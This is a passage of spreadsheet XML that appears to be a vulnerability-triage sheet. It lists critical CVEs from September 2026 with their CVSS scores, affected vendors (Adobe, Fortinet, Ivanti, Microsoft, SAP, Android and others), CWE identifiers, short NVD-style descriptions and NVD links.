t="n"><v>9.9</v></c><c r="E12" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F12" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G12" s="5" t="inlineStr" /><c r="H12" s="5" t="n"><v>0.006</v></c><c r="I12" s="5" t="inlineStr" /><c r="J12" s="5" t="inlineStr" /><c r="K12" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L12" s="5" t="inlineStr" /><c r="M12" s="5" t="inlineStr" /><c r="N12" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O12" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P12" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q12" s="5" t="inlineStr" /><c r="R12" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S12" s="5" t="inlineStr"><is><t>Adobe Experience Manager is affected by an Incorrect Authorization vulnerability that could result in arbitrary code execution in the context of the current user, potentially gaining elevated access or control over the victim's account or session. A low-privileged attacker could exploit this vulnerability to gain elevated access or control over the victim's account or session. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T12" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19232</t></is></c></row><row r="13"><c r="A13" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B13" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C13" s="5" t="inlineStr"><is><t>CVE-2026-26084</t></is></c><c r="D13" s="5" t="n"><v>9.9</v></c><c r="E13" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F13" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G13" s="5" t="inlineStr" /><c r="H13" s="5" t="n"><v>0.002</v></c><c r="I13" s="5" t="inlineStr" /><c r="J13" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K13" s="5" t="inlineStr" /><c r="L13" s="5" t="inlineStr" /><c r="M13" s="5" t="inlineStr" /><c r="N13" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P13" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q13" s="5" t="inlineStr" /><c r="R13" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S13" s="5" t="inlineStr"><is><t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t></is></c><c r="T13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>CVE-2026-48273</t></is></c><c r="D14" s="5" t="n"><v>9.9</v></c><c r="E14" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F14" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G14" s="5" t="inlineStr" /><c r="H14" s="5" t="n"><v>0.019</v></c><c r="I14" s="5" t="inlineStr" /><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr"><is><t>adobe:coldfusion</t></is></c><c r="L14" s="5" t="inlineStr" /><c r="M14" s="5" t="inlineStr" /><c r="N14" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P14" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q14" s="5" t="inlineStr" /><c r="R14" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S14" s="5" t="inlineStr"><is><t>ColdFusion is affected by an Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability that could result in arbitrary code execution in the context of the current user. A low-privileged attacker could exploit this vulnerability to execute arbitrary code. Exploitation of this issue does not require user interaction. Scope is changed.</t></is></c><c r="T14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-78234</t></is></c><c r="D15" s="5" t="n"><v>9.9</v></c><c r="E15" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F15" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G15" s="5" t="inlineStr" /><c r="H15" s="5" t="n"><v>0.002</v></c><c r="I15" s="5" t="inlineStr" /><c r="J15" s="5" t="inlineStr" /><c r="K15" s="5" t="inlineStr" /><c r="L15" s="5" t="inlineStr" /><c r="M15" s="5" t="inlineStr" /><c r="N15" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q15" s="5" t="inlineStr" /><c r="R15" s="5" t="inlineStr"><is><t>CWE-295</t></is></c><c r="S15" s="5" t="inlineStr"><is><t>A flaw was found in hawtio-operator. The operator reads the OpenShift Service CA private signing key from the openshift-service-ca namespace and uses it to mint client certificates with a Subject Common Name (CN) supplied by the author of a namespaced Hawtio custom resource. Because the operator ships a ClusterRole that aggregates Hawtio CR permissions into the edit and admin roles, any user with edit access in any namespace can obtain a Service-CA-signed certificate with an arbitrary subject. This certificate can be used to impersonate any in-cluster service identity to peers that trust the Service CA for client authentication, including Jolokia agents and other Service-CA-trusting components.</t></is></c><c r="T15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2026-86464</t></is></c><c r="D16" s="5" t="n"><v>9.9</v></c><c r="E16" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F16" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G16" s="5" t="inlineStr" /><c r="H16" s="5" t="n"><v>0.004</v></c><c r="I16" s="5" t="inlineStr" /><c r="J16" s="5" t="inlineStr"><is><t>kubernetes, docker, postgresql, keycloak</t></is></c><c r="K16" s="5" t="inlineStr" /><c r="L16" s="5" t="inlineStr" /><c r="M16" s="5" t="inlineStr" /><c r="N16" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O16" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P16" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q16" s="5" t="inlineStr" /><c r="R16" s="5" t="inlineStr"><is><t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t></is></c><c r="S16" s="5" t="inlineStr"><is><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is></c><c r="T16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2026-12744</t></is></c><c r="D17" s="5" t="n"><v>9.800000000000001</v></c><c r="E17" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F17" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G17" s="5" t="inlineStr" /><c r="H17" s="5" t="n"><v>0.022</v></c><c r="I17" s="5" t="inlineStr" /><c r="J17" s="5" t="inlineStr" /><c r="K17" s="5" t="inlineStr" /><c r="L17" s="5" t="inlineStr" /><c r="M17" s="5" t="inlineStr" /><c r="N17" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O17" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P17" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q17" s="5" t="inlineStr" /><c r="R17" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S17" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-12745</t></is></c><c r="D18" s="5" t="n"><v>9.800000000000001</v></c><c r="E18" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F18" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G18" s="5" t="inlineStr" /><c r="H18" s="5" t="n"><v>0.021</v></c><c r="I18" s="5" t="inlineStr" /><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr" /><c r="L18" s="5" t="inlineStr" /><c r="M18" s="5" t="inlineStr" /><c r="N18" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O18" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P18" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q18" s="5" t="inlineStr" /><c r="R18" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S18" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-28606</t></is></c><c r="D19" s="5" t="n"><v>9.800000000000001</v></c><c r="E19" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F19" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G19" s="5" t="inlineStr" /><c r="H19" s="5" t="n"><v>0.003</v></c><c r="I19" s="5" t="inlineStr" /><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L19" s="5" t="inlineStr" /><c r="M19" s="5" t="inlineStr" /><c r="N19" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O19" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P19" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q19" s="5" t="inlineStr" /><c r="R19" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S19" s="5" t="inlineStr"><is><t>In handleBondStateChanged of AdapterService.java, there is a possible way to skip pairing due to a logic error in the code. This could lead to remote escalation of privilege without user consent with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-49921</t></is></c><c r="D20" s="5" t="n"><v>9.800000000000001</v></c><c r="E20" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F20" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G20" s="5" t="inlineStr" /><c r="H20" s="5" t="n"><v>0.003</v></c><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr" /><c r="L20" s="5" t="inlineStr" /><c r="M20" s="5" t="inlineStr" /><c r="N20" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q20" s="5" t="inlineStr" /><c r="R20" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S20" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-58240</t></is></c><c r="D21" s="5" t="n"><v>9.800000000000001</v></c><c r="E21" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.003</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr" /><c r="M21" s="5" t="inlineStr" /><c r="N21" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O21" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P21" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q21" s="5" t="inlineStr" /><c r="R21" s="5" t="inlineStr"><is><t>CWE-308</t></is></c><c r="S21" s="5" t="inlineStr"><is><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is></c><c r="T21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-58822</t></is></c><c r="D22" s="5" t="n"><v>9.800000000000001</v></c><c r="E22" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.003</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr" /><c r="M22" s="5" t="inlineStr" /><c r="N22" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q22" s="5" t="inlineStr" /><c r="R22" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S22" s="5" t="inlineStr"><is><t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-61516</t></is></c><c r="D23" s="5" t="n"><v>9.800000000000001</v></c><c r="E23" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.004</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr" /><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr" /><c r="M23" s="5" t="inlineStr" /><c r="N23" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q23" s="5" t="inlineStr" /><c r="R23" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S23" s="5" t="inlineStr"><is><t>Netis NX10 firmware V4.0.1.5808 and V3.0.0.4142 contain an information disclosure vulnerability that allows unauthenticated attackers to retrieve the administrator password by sending a request to the sysinfo action in the web management interface without a valid session. Attackers can replay the exposed credential against the login handler to establish a fully authenticated administrator session on the device.</t></is></c><c r="T23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-66302</t></is></c><c r="D24" s="5" t="n"><v>9.800000000000001</v></c><c r="E24" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.005</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L24" s="5" t="inlineStr" /><c r="M24" s="5" t="inlineStr" /><c r="N24" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P24" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q24" s="5" t="inlineStr" /><c r="R24" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S24" s="5" t="inlineStr"><is><t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-67631</t></is></c><c r="D25" s="5" t="n"><v>9.800000000000001</v></c><c r="E25" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.006</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K25" s="5" t="inlineStr"><is><t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L25" s="5" t="inlineStr" /><c r="M25" s="5" t="inlineStr" /><c r="N25" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P25" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q25" s="5" t="inlineStr" /><c r="R25" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S25" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67631</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-67643</t></is></c><c r="D26" s="5" t="n"><v>9.800000000000001</v></c><c r="E26" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.008</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr"><is><t>microsoft:sql_server</t></is></c><c r="K26" s="5" t="inlineStr"><is><t>microsoft:sql_server_2022, microsoft:sql_server_2025</t></is></c><c r="L26" s="5" t="inlineStr" /><c r="M26" s="5" t="inlineStr" /><c r="N26" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P26" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q26" s="5" t="inlineStr" /><c r="R26" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S26" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-67643</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-68839</t></is></c><c r="D27" s="5" t="n"><v>9.800000000000001</v></c><c r="E27" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.008</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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7" s="5" t="inlineStr" /><c r="M27" s="5" t="inlineStr" /><c r="N27" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P27" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q27" s="5" t="inlineStr" /><c r="R27" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S27" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-69276</t></is></c><c r="D28" s="5" t="n"><v>9.800000000000001</v></c><c r="E28" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.008999999999999999</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr" /><c r="L28" s="5" t="inlineStr" /><c r="M28" s="5" t="inlineStr" /><c r="N28" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q28" s="5" t="inlineStr" /><c r="R28" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S28" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-69408</t></is></c><c r="D29" s="5" t="n"><v>9.800000000000001</v></c><c r="E29" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.01</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr" /><c r="K29" s="5" t="inlineStr" /><c r="L29" s="5" t="inlineStr" /><c r="M29" s="5" t="inlineStr" /><c r="N29" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P29" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q29" s="5" t="inlineStr" /><c r="R29" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S29" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-69431</t></is></c><c r="D30" s="5" t="n"><v>9.800000000000001</v></c><c r="E30" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.008999999999999999</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr" /><c r="M30" s="5" t="inlineStr" /><c r="N30" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P30" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q30" s="5" t="inlineStr" /><c r="R30" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S30" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-69463</t></is></c><c r="D31" s="5" t="n"><v>9.800000000000001</v></c><c r="E31" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.008999999999999999</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K3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1" s="5" t="inlineStr" /><c r="M31" s="5" t="inlineStr" /><c r="N31" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P31" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q31" s="5" t="inlineStr" /><c r="R31" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S31" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-69491</t></is></c><c r="D32" s="5" t="n"><v>9.800000000000001</v></c><c r="E32" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.008999999999999999</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr" /><c r="M32" s="5" t="inlineStr" /><c r="N32" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P32" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q32" s="5" t="inlineStr" /><c r="R32" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S32" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-69493</t></is></c><c r="D33" s="5" t="n"><v>9.800000000000001</v></c><c r="E33" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.01</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr" /><c r="K33" s="5" t="inlineStr" /><c r="L33" s="5" t="inlineStr" /><c r="M33" s="5" t="inlineStr" /><c r="N33" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P33" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q33" s="5" t="inlineStr" 